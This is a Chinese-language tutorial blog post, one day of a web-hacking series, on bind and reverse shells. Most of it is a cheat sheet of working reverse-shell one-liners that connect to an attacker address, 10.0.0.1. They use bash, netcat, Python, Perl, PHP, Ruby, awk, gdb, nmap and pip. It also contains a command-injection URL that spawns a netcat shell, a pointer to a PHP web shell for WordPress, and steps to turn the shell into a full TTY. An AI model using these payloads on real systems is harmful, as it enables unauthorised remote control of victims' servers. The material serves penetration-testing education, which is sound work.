iT邦幫忙

2021 iThome 鐵人賽

DAY 24
0
Security

讓Web開發者森77的Hacking Trick系列 第 24

[Day24] Bind Shell / Reverse Shell

前言

$nc -lvnp 1337

http://shhhhh.com/?cmd=nc%20-e%20/bin/sh%2010.0.0.1%201337

$id

root

正文

概念

在我們已經可以利用某個漏洞時,最期待的莫過於遇到可以RCE的洞,而我們從網站漏洞到拿到目標Server的Initial Access就是透過Bind Shell或Reverse Shell的方式。

Bind Shell

Bind shell是綁定到目標(受害者)主機上的特定port來監聽傳入連接的shell,例如:

先使用netcat將bash(sh) Shell綁定到目標主機上的1234 port

然後在攻擊者端通過這個1234 port連接到目標主機。(右方為攻擊者)


Reverse Shell

Reverse Shell則是相反
先在攻擊者(local)端監聽任何對4444 port的發起的連線,

然後讓目標主機(受害者端)對攻擊者端的4444 port發起連線。(右方為攻擊者)


兩者的差別在於,Reverse shell是從目標主機對攻擊者主機發起連線
而Bind Shell是先在目標主機上綁定特定port,然後等來自攻擊者主機對目標主機發起連線,就像後門(backdoor)一樣。

很多可以建立連線的程式語言/指令都可以用來寫Bind/Reverse Shell,依據語言特性也會有不同的寫法,甚至有些意想不到的command都可以用來寫Bind/Reverse Shell,下面列出幾個Reverse Shell:

  • nmap
export RHOST=10.0.0.1
export RPORT=1234
TF=$(mktemp)
echo 'local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
while true do
  local r,x=t:receive();local f=assert(io.popen(r,"r"));
  local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();' > $TF
nmap --script=$TF
  • bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

有時為了確保目標的shell使用bash會在前面加上bash -c:
bash -c `bash -i >& /dev/tcp/10.0.0.1/1234 0>&1`

  • gdb
export RHOST=10.0.0.1
export RPORT=1234
gdb -nx -ex 'python import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' -ex quit
  • Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • pip
export RHOST=10.0.0.1
export RPORT=1234
TF=$(mktemp -d)
echo 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py
pip install $TF
  • PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

另一種php Reverse Shell,適合用在具有某個可以修改且運行的php網站,例如將wordpress的404.php,換成這個類型的PHP Reverse Shell,礙於篇幅,我只將Github網址貼上來:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

  • Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  • Netcat
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  • awk
RHOST=10.0.0.1
RPORT=1234
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
    s = "/inet/tcp/0/" RHOST "/" RPORT;
    while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'

當你成功在目標主機上或的Initial Access後,最常碰到的問題就是,無法像正常的Shell一樣好用,例如不能使用方向鍵(像是上箭頭↑的指令歷史紀錄)、倒退、clear、無法正常使用vim等等,甚至一些指令如su,ssh都要求需要一個正常的Shell才能執行。

這時候我們就可以透過一些方法來將這個shell升級成完全交互式(Fully Interactive)的TTY

  • Python pty
    這也是我最常用的,首先在接收到從目標主機彈回來的Shell之後,在獲得的shell執行以下動作:
  1. python3 -c 'import pty; pty.spawn("/bin/bash")'
  2. Ctrl + z

會顯示

[1]+ Stopped nc -nvlp 1234

  1. stty raw -echo; fg
  2. 按兩次Enter

這樣就完成了,但仍然有一些問題,像是在輸入較長的指令時,會在非預期的地方換行甚至覆蓋掉原本寫的指令,非常不方便,所以需要讓這個升級過後的tty跟我們原本的terminal保持一致。

先在一個新的terminal執行:

  1. stty -a

拿到raws跟colums的值後,在剛剛升級的tty上寫下:
export TERM=xterm-256color
stty rows 32 colums 69
這樣我們就得到一個足夠好用的tty了


上一篇
[Day23] Session fixation
下一篇
[Day25] JSON Injection
系列文
讓Web開發者森77的Hacking Trick30

尚未有邦友留言

立即登入留言